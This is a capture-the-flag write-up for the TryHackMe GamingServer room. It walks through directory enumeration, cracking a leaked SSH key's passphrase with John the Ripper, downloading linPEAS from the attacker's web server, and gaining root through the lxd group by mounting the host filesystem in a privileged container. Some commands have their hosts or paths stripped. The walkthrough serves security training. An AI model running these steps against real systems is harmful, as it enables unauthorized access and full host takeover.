TryHackMe GamingServer Writeup
This is a writeup for TryHackMe room GamingServer.
NMAP is our ip address.
gobuster dir -u -w ./gobusterDir.txt
Webpage Inspection
As I was looking for clues at webpage, I found that someone left a comment line and it mentions about john. He might be an user for us to try for SSH.
As gobuster shows us there is a secret page and I found a RSA key named secretKey.
Now we can crack the RSA key we found earlier. I will create a new file, name it rsaid and paste the key in that file. Lets open JTR and convert the key to txt file so that John could crack it.
/usr/share/john/ rsaid > rsaid.txt
john rsaid.txt --wordlist=rockyou.txt
We can connect using SSH now but first I will give 600 permission to our rsaid file.
Lets connect with our RSA key and password that we found.
ssh -i 'rsaid' john@
User Flag
We logged in succesfully. Now lets search user flag. It is probably named as user.txt so I will search it directly.
Well, the flag was in our directory. I opened it obtained the flag.
Privilege Escalation and Root Flag
Now we need a way to gain root access. We can use LinPeas for our purpose.
PEASS-ng/linPEAS at master · peass-ng/PEASS-ng (
First lets host a python web server on our machine in the folder where Linpeas file located.
sudo python3 -m http.server 80
We can use wget on target machine and retrieve file.
wget yourip:port/
Lets give our file chmod +x and run it.
Seems like we are in lxd group. So we can use this and gain root access. Starting with downloading lxd alpine builder to our local machine.
saghul/lxd-alpine-builder: Build Alpine Linux images for LXD (
Lets download build-alpine file and execute it. This should create a compressed file.
We can host a remote server same way we did before.
python -m http.server
Lets contiune from our target host. Download our file from our server via wget command.
wget yourip:yourport/alpine-v3.20-x86_64-20240710_1606.tar.gz
Now we can run the following commands and get root access.
lxc image import ./alpine-v3.20-x86_64-20240710_1606.tar.gz
lxc image list
lxc init 11e9cf25a267 ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
Now we can go to cd /mnt/root/root/ and obtain the flag.